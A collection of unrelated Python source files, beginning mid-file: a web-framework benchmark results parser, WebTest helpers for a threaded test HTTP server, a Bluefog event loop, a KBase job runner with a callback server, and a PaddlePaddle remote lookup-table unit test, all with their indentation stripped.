self.failed['cached_query'] = []
self.verify = dict()
#############################################################################
# PUBLIC FUNCTIONS
#############################################################################
def parse(self, tests):
'''
Ensures that the system has all necessary software to run
the tests. This does not include that software for the individual
test, but covers software such as curl and weighttp that
are needed.
'''
# Run the method to get the commmit count of each framework.
self.__count_commits()
# Call the method which counts the sloc for each framework
self.__count_sloc()
# Time to create parsed files
# Aggregate JSON file
with open(self.file, "w") as f:
f.write(json.dumps(self.__to_jsonable(), indent=2))
def parse_test(self, framework_test, test_type):
'''
Parses the given test and test_type from the raw_file.
'''
results = dict()
results['results'] = []
stats = []
if os.path.exists(self.get_raw_file(framework_test.name, test_type)):
with open(self.get_raw_file(framework_test.name,
test_type)) as raw_data:
is_warmup = True
rawData = None
for line in raw_data:
if "Queries:" in line or "Concurrency:" in line:
is_warmup = False
rawData = None
continue
if "Warmup" in line or "Primer" in line:
is_warmup = True
continue
if not is_warmup:
if rawData == None:
rawData = dict()
results['results'].append(rawData)
if "Latency" in line:
m = re.findall(r"([0-9]+\.*[0-9]*[us|ms|s|m|%]+)",
line)
if len(m) == 4:
rawData['latencyAvg'] = m[0]
rawData['latencyStdev'] = m[1]
rawData['latencyMax'] = m[2]
if "requests in" in line:
m = re.search("([0-9]+) requests in", line)
if m != None:
rawData['totalRequests'] = int(m.group(1))
if "Socket errors" in line:
if "connect" in line:
m = re.search("connect ([0-9]+)", line)
rawData['connect'] = int(m.group(1))
if "read" in line:
m = re.search("read ([0-9]+)", line)
rawData['read'] = int(m.group(1))
if "write" in line:
m = re.search("write ([0-9]+)", line)
rawData['write'] = int(m.group(1))
if "timeout" in line:
m = re.search("timeout ([0-9]+)", line)
rawData['timeout'] = int(m.group(1))
if "Non-2xx" in line:
m = re.search("Non-2xx or 3xx responses: ([0-9]+)",
line)
if m != None:
rawData['5xx'] = int(m.group(1))
if "STARTTIME" in line:
m = re.search("[0-9]+", line)
rawData["startTime"] = int(m.group(0))
if "ENDTIME" in line:
m = re.search("[0-9]+", line)
rawData["endTime"] = int(m.group(0))
test_stats = self.__parse_stats(
framework_test, test_type,
rawData["startTime"], rawData["endTime"], 1)
stats.append(test_stats)
with open(
self.get_stats_file(framework_test.name, test_type) + ".json",
"w") as stats_file:
json.dump(stats, stats_file, indent=2)
return results
def parse_all(self, framework_test):
'''
Method meant to be run for a given timestamp
'''
for test_type in framework_test.runTests:
if os.path.exists(
self.get_raw_file(framework_test.name, test_type)):
results = self.parse_test(framework_test, test_type)
self.report_benchmark_results(framework_test, test_type,
results['results'])
def write_intermediate(self, test_name, status_message):
'''
Writes the intermediate results for the given test_name and status_message
'''
self.completed[test_name] = status_message
self.__write_results()
def set_completion_time(self):
'''
Sets the completionTime for these results and writes the results
'''
self.completionTime = int(round(time.time() * 1000))
self.__write_results()
def upload(self):
'''
Attempts to upload the results.json to the configured results_upload_uri
'''
if self.config.results_upload_uri != None:
try:
requests.post(
self.config.results_upload_uri,
headers={'Content-Type': 'application/json'},
data=json.dumps(self.__to_jsonable(), indent=2))
except (Exception):
log("Error uploading results.json")
def load(self):
'''
Load the results.json file
'''
try:
with open(self.file) as f:
self.__dict__.update(json.load(f))
except (ValueError, IOError):
pass
def get_raw_file(self, test_name, test_type):
'''
Returns the output file for this test_name and test_type
Example: fw_root/results/timestamp/test_type/test_name/raw.txt
'''
path = os.path.join(self.directory, test_name, test_type, "raw.txt")
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
def get_stats_file(self, test_name, test_type):
'''
Returns the stats file name for this test_name and
Example: fw_root/results/timestamp/test_type/test_name/stats.txt
'''
path = os.path.join(self.directory, test_name, test_type, "stats.txt")
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
def report_verify_results(self, framework_test, test_type, result):
'''
Used by FrameworkTest to add verification details to our results
TODO: Technically this is an IPC violation - we are accessing
the parent process' memory from the child process
'''
if framework_test.name not in self.verify.keys():
self.verify[framework_test.name] = dict()
self.verify[framework_test.name][test_type] = result
def report_benchmark_results(self, framework_test, test_type, results):
'''
Used by FrameworkTest to add benchmark data to this
TODO: Technically this is an IPC violation - we are accessing
the parent process' memory from the child process
'''
if test_type not in self.rawData.keys():
self.rawData[test_type] = dict()
# If results has a size from the parse, then it succeeded.
if results:
self.rawData[test_type][framework_test.name] = results
# This may already be set for single-tests
if framework_test.name not in self.succeeded[test_type]:
self.succeeded[test_type].append(framework_test.name)
else:
# This may already be set for single-tests
if framework_test.name not in self.failed[test_type]:
self.failed[test_type].append(framework_test.name)
def finish(self):
'''
Finishes these results.
'''
if not self.config.parse:
# Normally you don't have to use Fore.BLUE before each line, but
# Travis-CI seems to reset color codes on newline (see travis-ci/travis-ci#2692)
# or stream flush, so we have to ensure that the color code is printed repeatedly
log("Verification Summary",
border='=',
border_bottom='-',
color=Fore.CYAN)
for test in self.benchmarker.tests:
log(Fore.CYAN + "| {!s}".format(test.name))
if test.name in self.verify.keys():
for test_type, result in self.verify[
test.name].iteritems():
if result.upper() == "PASS":
color = Fore.GREEN
elif result.upper() == "WARN":
color = Fore.YELLOW
else:
color = Fore.RED
log(Fore.CYAN + "| " + test_type.ljust(13) +
' : ' + color + result.upper())
else:
log(Fore.CYAN + "| " + Fore.RED +
"NO RESULTS (Did framework launch?)")
log('', border='=', border_bottom='', color=Fore.CYAN)
log("Results are saved in " + self.directory)
#############################################################################
# PRIVATE FUNCTIONS
#############################################################################
def __to_jsonable(self):
'''
Returns a dict suitable for jsonification
'''
toRet = dict()
toRet['uuid'] = self.uuid
toRet['name'] = self.name
toRet['environmentDescription'] = self.environmentDescription
toRet['git'] = self.git
toRet['startTime'] = self.startTime
toRet['completionTime'] = self.completionTime
toRet['concurrencyLevels'] = self.concurrencyLevels
toRet['pipelineConcurrencyLevels'] = self.pipelineConcurrencyLevels
toRet['queryIntervals'] = self.queryIntervals
toRet['cachedQueryIntervals'] = self.cachedQueryIntervals
toRet['frameworks'] = self.frameworks
toRet['duration'] = self.duration
toRet['rawData'] = self.rawData
toRet['completed'] = self.completed
toRet['succeeded'] = self.succeeded
toRet['failed'] = self.failed
toRet['verify'] = self.verify
return toRet
def __write_results(self):
try:
with open(self.file, 'w') as f:
f.write(json.dumps(self.__to_jsonable(), indent=2))
except (IOError):
log("Error writing results.json")
def __count_sloc(self):
'''
Counts the significant lines of code for all tests and stores in results.
'''
frameworks = self.benchmarker.metadata.gather_frameworks(
self.config.test, self.config.exclude)
framework_to_count = {}
for framework, testlist in frameworks.items():
wd = testlist[0].directory
# Find the last instance of the word 'code' in the yaml output. This
# should be the line count for the sum of all listed files or just
# the line count for the last file in the case where there's only
# one file listed.
command = "cloc --yaml --follow-links . | grep code | tail -1 | cut -d: -f 2"
log("Running \"%s\" (cwd=%s)" % (command, wd))
try:
line_count = int(subprocess.check_output(command, cwd=wd, shell=True))
except (subprocess.CalledProcessError, ValueError) as e:
log("Unable to count lines of code for %s due to error '%s'" %
(framework, e))
continue
log("Counted %s lines of code" % line_count)
framework_to_count[framework] = line_count
self.rawData['slocCounts'] = framework_to_count
def __count_commits(self):
'''
Count the git commits for all the framework tests
'''
frameworks = self.benchmarker.metadata.gather_frameworks(
self.config.test, self.config.exclude)
def count_commit(directory, jsonResult):
command = "git rev-list HEAD -- " + directory + " | sort -u | wc -l"
try:
commitCount = subprocess.check_output(command, shell=True)
jsonResult[framework] = int(commitCount)
except subprocess.CalledProcessError:
pass
# Because git can be slow when run in large batches, this
# calls git up to 4 times in parallel. Normal improvement is ~3-4x
# in my trials, or ~100 seconds down to ~25
# This is safe to parallelize as long as each thread only
# accesses one key in the dictionary
threads = []
jsonResult = {}
# t1 = datetime.now()
for framework, testlist in frameworks.items():
directory = testlist[0].directory
t = threading.Thread(
target=count_commit, args=(directory, jsonResult))
t.start()
threads.append(t)
# Git has internal locks, full parallel will just cause contention
# and slowness, so we rate-limit a bit
if len(threads) >= 4:
threads[0].join()
threads.remove(threads[0])
# Wait for remaining threads
for t in threads:
t.join()
# t2 = datetime.now()
# print "Took %s seconds " % (t2 - t1).seconds
self.rawData['commitCounts'] = jsonResult
self.config.commits = jsonResult
def __get_git_commit_id(self):
'''
Get the git commit id for this benchmark
'''
return subprocess.check_output(
["git", "rev-parse", "HEAD"], cwd=self.config.fw_root).strip()
def __get_git_repository_url(self):
'''
Gets the git repository url for this benchmark
'''
return subprocess.check_output(
["git", "config", "--get", "remote.origin.url"],
cwd=self.config.fw_root).strip()
def __get_git_branch_name(self):
'''
Gets the git branch name for this benchmark
'''
return subprocess.check_output(
'git rev-parse --abbrev-ref HEAD',
shell=True,
cwd=self.config.fw_root).strip()
def __parse_stats(self, framework_test, test_type, start_time, end_time,
interval):
'''
For each test type, process all the statistics, and return a multi-layered
dictionary that has a structure as follows:
(timestamp)
| (main header) - group that the stat is in
| | (sub header) - title of the stat
| | | (stat) - the stat itself, usually a floating point number
'''
stats_dict = dict()
stats_file = self.get_stats_file(framework_test.name, test_type)
with open(stats_file) as stats:
# dstat doesn't output a completely compliant CSV file - we need to strip the header
while (stats.next() != "\n"):
pass
stats_reader = csv.reader(stats)
main_header = stats_reader.next()
sub_header = stats_reader.next()
time_row = sub_header.index("epoch")
int_counter = 0
for row in stats_reader:
time = float(row[time_row])
int_counter += 1
if time < start_time:
continue
elif time > end_time:
return stats_dict
if int_counter % interval != 0:
continue
row_dict = dict()
for nextheader in main_header:
if nextheader != "":
row_dict[nextheader] = dict()
header = ""
for item_num, column in enumerate(row):
if (len(main_header[item_num]) != 0):
header = main_header[item_num]
# all the stats are numbers, so we want to make sure that they stay that way in json
row_dict[header][sub_header[item_num]] = float(column)
stats_dict[time] = row_dict
return stats_dict
def __calculate_average_stats(self, raw_stats):
'''
We have a large amount of raw data for the statistics that may be useful
for the stats nerds, but most people care about a couple of numbers. For
now, we're only going to supply:
* Average CPU
* Average Memory
* Total network use
* Total disk use
More may be added in the future. If they are, please update the above list.
Note: raw_stats is directly from the __parse_stats method.
Recall that this consists of a dictionary of timestamps, each of which
contain a dictionary of stat categories which contain a dictionary of stats
'''
raw_stat_collection = dict()
for time_dict in raw_stats.items()[1]:
for main_header, sub_headers in time_dict.items():
item_to_append = None
if 'cpu' in main_header:
# We want to take the idl stat and subtract it from 100
# to get the time that the CPU is NOT idle.
item_to_append = sub_headers['idl'] - 100.0
elif main_header == 'memory usage':
item_to_append = sub_headers['used']
elif 'net' in main_header:
# Network stats have two parts - recieve and send. We'll use a tuple of
# style (recieve, send)
item_to_append = (sub_headers['recv'], sub_headers['send'])
elif 'dsk' or 'io' in main_header:
# Similar for network, except our tuple looks like (read, write)
item_to_append = (sub_headers['read'], sub_headers['writ'])
if item_to_append is not None:
if main_header not in raw_stat_collection:
raw_stat_collection[main_header] = list()
raw_stat_collection[main_header].append(item_to_append)
# Simple function to determine human readable size
# http://stackoverflow.com/questions/1094841/reusable-library-to-get-human-readable-version-of-file-size
def sizeof_fmt(num):
# We'll assume that any number we get is convertable to a float, just in case
num = float(num)
for x in ['bytes', 'KB', 'MB', 'GB']:
if num < 1024.0 and num > -1024.0:
return "%3.1f%s" % (num, x)
num /= 1024.0
return "%3.1f%s" % (num, 'TB')
# Now we have our raw stats in a readable format - we need to format it for display
# We need a floating point sum, so the built in sum doesn't cut it
display_stat_collection = dict()
for header, values in raw_stat_collection.items():
display_stat = None
if 'cpu' in header:
display_stat = sizeof_fmt(math.fsum(values) / len(values))
elif main_header == 'memory usage':
display_stat = sizeof_fmt(math.fsum(values) / len(values))
elif 'net' in main_header:
receive, send = zip(*values) # unzip
display_stat = {
'receive': sizeof_fmt(math.fsum(receive)),
'send': sizeof_fmt(math.fsum(send))
}
else: # if 'dsk' or 'io' in header:
read, write = zip(*values) # unzip
display_stat = {
'read': sizeof_fmt(math.fsum(read)),
'write': sizeof_fmt(math.fsum(write))
}
display_stat_collection[header] = display_stat
return display_stat
|
http.py
|
# -*- coding: utf-8 -*-
"""
This module contains some helpers to deal with the real http
world.
"""
import threading
import logging
import select
import socket
import time
import os
import six
import webob
from six.moves import http_client
from waitress.server import TcpWSGIServer
def get_free_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 0))
ip, port = s.getsockname()
s.close()
ip = os.environ.get('WEBTEST_SERVER_BIND', '127.0.0.1')
return ip, port
def check_server(host, port, path_info='/', timeout=3, retries=30):
"""Perform a request until the server reply"""
if retries < 0:
return 0
time.sleep(.3)
for i in range(retries):
try:
conn = http_client.HTTPConnection(host, int(port), timeout=timeout)
conn.request('GET', path_info)
res = conn.getresponse()
return res.status
except (socket.error, http_client.HTTPException):
time.sleep(.3)
return 0
class StopableWSGIServer(TcpWSGIServer):
"""StopableWSGIServer is a TcpWSGIServer which run in a separated thread.
This allow to use tools like casperjs or selenium.
Server instance have an ``application_url`` attribute formated with the
server host and port.
"""
was_shutdown = False
def __init__(self, application, *args, **kwargs):
super(StopableWSGIServer, self).__init__(self.wrapper, *args, **kwargs)
self.runner = None
self.test_app = application
self.application_url = 'http://%s:%s/' % (self.adj.host, self.adj.port)
def wrapper(self, environ, start_response):
"""Wrap the wsgi application to override some path:
``/__application__``: allow to ping the server.
``/__file__?__file__={path}``: serve the file found at ``path``
"""
if '__file__' in environ['PATH_INFO']:
req = webob.Request(environ)
resp = webob.Response()
resp.content_type = 'text/html; charset=UTF-8'
filename = req.params.get('__file__')
if os.path.isfile(filename):
body = open(filename, 'rb').read()
body = body.replace(six.b('http://localhost/'),
six.b('http://%s/' % req.host))
resp.body = body
else:
resp.status = '404 Not Found'
return resp(environ, start_response)
elif '__application__' in environ['PATH_INFO']:
return webob.Response('server started')(environ, start_response)
return self.test_app(environ, start_response)
def run(self):
"""Run the server"""
try:
self.asyncore.loop(.5, map=self._map)
except select.error: # pragma: no cover
if not self.was_shutdown:
raise
def shutdown(self):
"""Shutdown the server"""
# avoid showing traceback related to asyncore
self.was_shutdown = True
self.logger.setLevel(logging.FATAL)
while self._map:
triggers = list(self._map.values())
for trigger in triggers:
trigger.handle_close()
self.maintenance(0)
self.task_dispatcher.shutdown()
return True
@classmethod
def create(cls, application, **kwargs):
"""Start a server to serve ``application``. Return a server
instance."""
host, port = get_free_port()
if 'port' not in kwargs:
kwargs['port'] = port
if 'host' not in kwargs:
kwargs['host'] = host
if 'expose_tracebacks' not in kwargs:
kwargs['expose_tracebacks'] = True
server = cls(application, **kwargs)
server.runner = threading.Thread(target=server.run)
server.runner.daemon = True
server.runner.start()
return server
def wait(self, retries=30):
"""Wait until the server is started"""
running = check_server(self.adj.host, self.adj.port,
'/__application__', retries=retries)
if running:
return True
try:
self.shutdown()
finally:
return False
|
eventloop.py
|
# Copyright 2021 Bluefog Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import abc
import logging
import selectors
import socket
import threading
from typing import Optional, Union
from bluefoglite.common import const
from bluefoglite.common.logger import logging
class Handler(abc.ABC):
@abc.abstractmethod
def handleEvent(self, event: int):
raise NotImplementedError
# TODO(ybc) make this class singleton?
class EventLoop:
def __init__(self):
self.sel = selectors.DefaultSelector()
self.done = False # Python assignment to simple variable is "atomic"
self.running_thread = None
self.closed = False
self._cv = threading.Condition()
self.error: Optional[Exception] = None
def __del__(self):
self.close()
def run(self):
if self.running_thread is not None:
print("Event Loop is already running")
return
# print('start running loop')
self.running_thread = threading.Thread(
target=EventLoop._run, args=(self,), daemon=True
)
self.running_thread.start()
def is_alive(self) -> bool:
if self.running_thread is None:
return False
return self.running_thread.is_alive()
def _run(self):
while not self.done:
# self._cv.notify_all()
# Find a better timeout choice? for closing the loop.
events_list = self.sel.select(const.EVENT_LOOP_TIMEOUT)
for key, event in events_list:
try:
# key is the SelectorKey instance corresponding to a ready file object.
# SelectorKey is a namedtuple: (fileobj, fd, events, data)
# We force the data to be the instance of abstract class Handler.
key.data.handleEvent(event)
# TODO Handle the error different with specified type
except Exception as e: # pylint: disable=broad-except
self.error = e
break
logging.debug("_run: %s", self.done)
# TODO proper throw the error in the run thread to the main thread?
if self.error: # stopped unexcepted:
self.sel.close()
break
def register(self, fd: Union[int, socket.socket], event: int, handler: Handler):
self.sel.register(fd, event, handler)
def modify(self, fd: Union[int, socket.socket], event: int, handler: Handler):
self.sel.modify(fd, event, handler)
def unregister(self, fd: Union[int, socket.socket]):
self.sel.unregister(fd)
# make sure `unregister` returned after the loop ticked?
# self._cv.acquire()
# self._cv.wait()
# self._cv.release()
def close(self):
if self.closed:
return
self.done = True
self.running_thread.join()
self.sel.close()
self.closed = True
if self.error:
raise self.error
|
JobRunner.py
|
import logging
import os
import signal
import socket
from multiprocessing import Process, Queue
from queue import Empty
from socket import gethostname
from time import sleep as _sleep
from time import time as _time
import requests
from clients.authclient import KBaseAuth
from clients.execution_engine2Client import execution_engine2 as EE2
from .CatalogCache import CatalogCache
from .MethodRunner import MethodRunner
from .SpecialRunner import SpecialRunner
from .callback_server import start_callback_server
from .exceptions import CantRestartJob
from .logger import Logger
from .provenance import Provenance
logging.basicConfig(format="%(created)s %(levelname)s: %(message)s", level=logging.INFO)
class JobRunner(object):
"""
This class provides the mechanisms to launch a KBase job
on a container runtime. It handles starting the callback service
to support subjobs and provenenace calls.
"""
def __init__(self, config, ee2_url, job_id, token, admin_token, debug=False):
"""
inputs: config dictionary, EE2 URL, Job id, Token, Admin Token
"""
self.ee2 = EE2(url=ee2_url, timeout=60)
self.logger = Logger(ee2_url, job_id, ee2=self.ee2)
self.token = token
self.client_group = os.environ.get("CLIENTGROUP", "None")
self.bypass_token = os.environ.get("BYPASS_TOKEN", True)
self.admin_token = admin_token
self.config = self._init_config(config, job_id, ee2_url)
self.hostname = gethostname()
self.auth = KBaseAuth(config.get("auth-service-url"))
self.job_id = job_id
self.workdir = config.get("workdir", "/mnt/awe/condor")
self.jr_queue = Queue()
self.callback_queue = Queue()
self.prov = None
self._init_callback_url()
self.debug = debug
self.mr = MethodRunner(
self.config, job_id, logger=self.logger, debug=self.debug
)
self.sr = SpecialRunner(self.config, job_id, logger=self.logger)
self.cc = CatalogCache(config)
self.max_task = config.get("max_tasks", 20)
self.cbs = None
signal.signal(signal.SIGINT, self.shutdown)
def _init_config(self, config, job_id, ee2_url):
"""
Initialize config dictionary
"""
config["hostname"] = gethostname()
config["job_id"] = job_id
config["ee2_url"] = ee2_url
token = self.token
config["token"] = token
config["admin_token"] = self.admin_token
return config
def _check_job_status(self):
"""
returns True if the job is still okay to run.
"""
try:
status = self.ee2.check_job_canceled({"job_id": self.job_id})
except Exception as e:
self.logger.error(
f"Warning: Job cancel check failed due to {e}. However, the job will continue to run."
)
return True
if status.get("finished", False):
return False
return True
def _init_workdir(self):
""" Check to see for existence of scratch dir: /mnt/awe/condor or /cdr/ """
if not os.path.exists(self.workdir):
self.logger.error("Missing workdir")
raise OSError("Missing Working Directory")
def _get_cgroup(self):
""" Examine /proc/PID/cgroup to get the cgroup the runner is using """
if os.environ.get("NO_CGROUP"):
return None
pid = os.getpid()
cfile = "/proc/{}/cgroup".format(pid)
# TODO REMOVE THIS OR FIGURE OUT FOR TESTING WHAT TO DO ABOUT THIS
if not os.path.exists(cfile):
raise Exception(f"Couldn't find cgroup {cfile}")
else:
with open(cfile) as f:
for line in f:
if line.find("htcondor") > 0:
items = line.split(":")
if len(items) == 3:
return items[2].strip()
raise Exception(f"Couldn't parse out cgroup from {cfile}")
def _submit_special(self, config, job_id, job_params):
"""
Handler for methods such as CWL, WDL and HPC
"""
(module, method) = job_params["method"].split(".")
self.logger.log("Submit %s as a %s:%s job" % (job_id, module, method))
self.sr.run(
config,
job_params,
job_id,
callback=self.callback_url,
fin_q=[self.jr_queue],
)
def _submit(self, config, job_id, job_params, subjob=True):
(module, method) = job_params["method"].split(".")
service_ver = job_params.get("service_ver")
if service_ver is None:
service_ver = job_params.get("context", {}).get("service_ver")
# TODO Fail gracefully if this step fails. For example, setting service_ver='fake'
module_info = self.cc.get_module_info(module, service_ver)
git_url = module_info["git_url"]
git_commit = module_info["git_commit_hash"]
if not module_info["cached"]:
fstr = "Running module {}: url: {} commit: {}"
self.logger.log(fstr.format(module, git_url, git_commit))
else:
version = module_info["version"]
f = "WARNING: Module {} was already used once for this job. "
f += "Using cached version: url: {} "
f += "commit: {} version: {} release: release"
self.logger.error(f.format(module, git_url, git_commit, version))
vm = self.cc.get_volume_mounts(module, method, self.client_group)
config["volume_mounts"] = vm
action = self.mr.run(
config,
module_info,
job_params,
job_id,
callback=self.callback_url,
subjob=subjob,
fin_q=self.jr_queue,
)
self._update_prov(action)
def _cancel(self):
self.mr.cleanup_all(debug=self.debug)
def shutdown(self, sig, bt):
print("Recieved an interrupt")
# Send a cancel to the queue
self.jr_queue.put(["cancel", None, None])
def _watch(self, config):
# Run a thread to check for expired token
# Run a thread for 7 day max job runtime
cont = True
ct = 1
exp_time = self._get_token_lifetime(config) - 600
while cont:
try:
req = self.jr_queue.get(timeout=1)
if _time() > exp_time:
err = "Token has expired"
self.logger.error(err)
self._cancel()
return {"error": err}
if req[0] == "submit":
if ct > self.max_task:
self.logger.error("Too many subtasks")
self._cancel()
return {"error": "Canceled or unexpected error"}
if req[2].get("method").startswith("special."):
self._submit_special(
config=config, job_id=req[1], job_params=req[2]
)
else:
self._submit(config=config, job_id=req[1], job_params=req[2])
ct += 1
elif req[0] == "finished_special":
job_id = req[1]
self.callback_queue.put(["output", job_id, req[2]])
ct -= 1
elif req[0] == "finished":
subjob = True
job_id = req[1]
if job_id == self.job_id:
subjob = False
output = self.mr.get_output(job_id, subjob=subjob)
self.callback_queue.put(["output", job_id, output])
ct -= 1
if not subjob:
if ct > 0:
err = "Orphaned containers may be present"
self.logger.error(err)
return output
elif req[0] == "cancel":
self._cancel()
return {}
except Empty:
pass
if ct == 0:
print("Count got to 0 without finish")
# This shouldn't happen
return
# Run cancellation / finish job checker
if not self._check_job_status():
self.logger.error("Job canceled or unexpected error")
self._cancel()
_sleep(5)
return {"error": "Canceled or unexpected error"}
def _init_callback_url(self):
# Find a free port and Start up callback server
if os.environ.get("CALLBACK_IP") is not None:
self.ip = os.environ.get("CALLBACK_IP")
self.logger.log("Callback IP provided ({})".format(self.ip))
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("gmail.com", 80))
self.ip = s.getsockname()[0]
s.close()
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("", 0))
self.port = sock.getsockname()[1]
sock.close()
url = "http://{}:{}/".format(self.ip, self.port)
self.logger.log("Job runner recieved Callback URL {}".format(url))
self.callback_url = url
def _update_prov(self, action):
self.prov.add_subaction(action)
self.callback_queue.put(["prov", None, self.prov.get_prov()])
def _validate_token(self):
# Validate token and get user name
try:
user = self.auth.get_user(self.config["token"])
except Exception as e:
self.logger.error("Token validation failed")
raise Exception(e)
return user
def _get_token_lifetime(self, config):
try:
url = config.get("auth-service-url-v2")
logging.info(f"About to get token lifetime from {url} for user token")
header = {"Authorization": self.config["token"]}
resp = requests.get(url, headers=header).json()
return resp["expires"]
except Exception as e:
self.logger.error("Failed to get token lifetime")
raise e
def _retry_finish(self, finish_job_params, success):
"""
In case of failure to finish, retry once
"""
if success:
if (
"job_output" not in finish_job_params
or finish_job_params["job_output"] is None
):
finish_job_params["job_output"] = {}
try:
self.ee2.finish_job(finish_job_params)
except Exception:
_sleep(30)
self.ee2.finish_job(finish_job_params)
def run(self):
"""
This method starts the actual run. This is a blocking operation and
will not return until the job finishes or encounters and error.
This method also handles starting up the callback server.
"""
running_msg = f"Running job {self.job_id} ({os.environ.get('CONDOR_ID')}) on {self.hostname} ({self.ip}) in {self.workdir}"
self.logger.log(running_msg)
logging.info(running_msg)
cg_msg = "Client group: {}".format(self.client_group)
self.logger.log(cg_msg)
logging.info(cg_msg)
# Check to see if the job was run before or canceled already.
# If so, log it
logging.info("About to check job status")
if not self._check_job_status():
error_msg = "Job already run or terminated"
self.logger.error(error_msg)
logging.error(error_msg)
raise CantRestartJob(error_msg)
# Get job inputs from ee2 db
# Config is not stored in job anymore, its a server wide config
# I don't think this matters for reproducibility
logging.info("About to get job params and config")
try:
job_params = self.ee2.get_job_params({"job_id": self.job_id})
except Exception as e:
self.logger.error("Failed to get job parameters. Exiting.")
raise e
try:
config = self.ee2.list_config()
except Exception as e:
self.logger.error("Failed to config . Exiting.")
raise e
config["job_id"] = self.job_id
self.logger.log(
f"Server version of Execution Engine: {config.get('ee.server.version')}"
)
# Update job as started and log it
logging.info("About to start job")
try:
self.ee2.start_job({"job_id": self.job_id})
except Exception as e:
self.logger.error(
"Job already started once. Job restarts are not currently supported"
)
raise e
logging.info("Initing work dir")
self._init_workdir()
config["workdir"] = self.workdir
config["user"] = self._validate_token()
config["cgroup"] = self._get_cgroup()
logging.info("Setting provenance")
self.prov = Provenance(job_params)
# Start the callback server
logging.info("Starting callback server")
cb_args = [
self.ip,
self.port,
self.jr_queue,
self.callback_queue,
self.token,
self.bypass_token,
]
self.cbs = Process(target=start_callback_server, args=cb_args)
self.cbs.start()
# Submit the main job
self.logger.log(f"Job is about to run {job_params.get('app_id')}")
# TODO Try except for when submit or watch failure happens and correct finishjob call
self._submit(
config=config, job_id=self.job_id, job_params=job_params, subjob=False
)
output = self._watch(config)
self.cbs.terminate()
self.logger.log("Job is done")
error = output.get("error")
if error:
error_message = "Job output contains an error"
self.logger.error(f"{error_message} {error}")
self._retry_finish(
{"job_id": self.job_id, "error_message": error_message, "error": error},
success=False,
)
else:
self._retry_finish(
{"job_id": self.job_id, "job_output": output}, success=True
)
# TODO: Attempt to clean up any running docker containers
# (if something crashed, for example)
return output
# Run docker or shifter and keep a record of container id and
# subjob container ids
# Run a job shutdown hook
|
test_lookup_remote_table_op.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import signal
import time
import unittest
from multiprocessing import Process
import numpy as np
import paddle.fluid as fluid
import paddle.fluid.core as core
from paddle.fluid.op import Operator
from paddle.fluid.framework import Program, program_guard
def run_pserver(pserver_id, use_cuda, sync_mode):
scope = fluid.core.Scope()
program = Program()
with fluid.scope_guard(scope):
with program_guard(program, startup_program=Program()):
# create table parameter in scope
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
# create and initialize Param Variable
param = scope.var('table').get_tensor()
param_array = np.ones((10, 8)).astype("float32")
for i in range(len(param_array)):
param_array[i] *= param_array[i] * i + pserver_id * 10
param.set(param_array, place)
optimize_block = program._create_block(program.global_block().idx)
program.global_block().append_op(
type="listen_and_serv",
inputs={'X': []},
outputs={},
attrs={
"optimize_blocks": [optimize_block],
"endpoint": '127.0.0.1:0',
"Fanin": 1,
"sync_mode": True,
"grad_to_block_id": []
})
exe = fluid.Executor(place)
exe.run(program)
class TestListenAndServOp(unittest.TestCase):
def setUp(self):
self.ps_timeout = 5
def _start_pserver(self, pserver_id, use_cuda, sync_mode, pserver_func):
p = Process(target=pserver_func, args=(pserver_id, use_cuda, sync_mode))
p.daemon = True
p.start()
return p
def _wait_ps_ready(self, pid):
start_left_time = self.ps_timeout
sleep_time = 0.5
while True:
assert start_left_time >= 0, "wait ps ready failed"
time.sleep(sleep_time)
try:
# the listen_and_serv_op would touch a file which contains the listen port
# on the /tmp directory until it was ready to process all the RPC call.
os.stat("/tmp/paddle.%d.port" % pid)
return
except os.error:
start_left_time -= sleep_time
def _get_pserver_port(self, pid):
with open("/tmp/paddle.%d.port" % pid, 'r') as f:
port = int(f.read().strip())
return port
def _run_lookup_table_op_one_pserver(self, place, port):
scope = fluid.core.Scope()
program = Program()
with fluid.scope_guard(scope):
with program_guard(program, startup_program=Program()):
# create and initialize Param Variable
param = scope.var('W').get_tensor()
param_array = np.full((10, 8), 1.0).astype("float32")
param.set(param_array, place)
ids = scope.var('Ids').get_tensor()
ids_array = np.array([[1], [2], [5]]).astype("int64")
ids.set(ids_array, place)
ids_lod = [[0, 1, 2, 3]]
ids.set_lod(ids_lod)
out = scope.var('Out').get_tensor()
emaps = ['127.0.0.1:' + str(port)]
table_names = ['table']
height_sections = [10]
# create and run sgd operator
lookup_table_op = Operator(
"lookup_table",
W='W',
Ids='Ids',
Out='Out',
remote_prefetch=True,
epmap=emaps,
table_names=table_names,
height_sections=height_sections)
lookup_table_op.run(scope, place)
# get and compare result
result_array = np.array(out)
self.assertEqual(out.lod(), ids_lod)
self.assertEqual(list(result_array.shape), [len(ids_array), 8])
for i in range(len(ids_array)):
id = ids_array[i][0]
self.assertTrue((result_array[i] == id).all())
def _run_lookup_table_op_two_pserver(self, place, port0, port1):
scope = fluid.core.Scope()
program = Program()
with fluid.scope_guard(scope):
with program_guard(program, startup_program=Program()):
# create and initialize Param Variable
param = scope.var('W').get_tensor()
param_array = np.full((10, 8), 1.0).astype("float32")
param.set(param_array, place)
ids = scope.var('Ids').get_tensor()
ids_array = np.array([[1], [2], [11], [13]]).astype("int64")
ids.set(ids_array, place)
ids_lod = [[0, 2, 3, 4]]
ids.set_lod(ids_lod)
out = scope.var('Out').get_tensor()
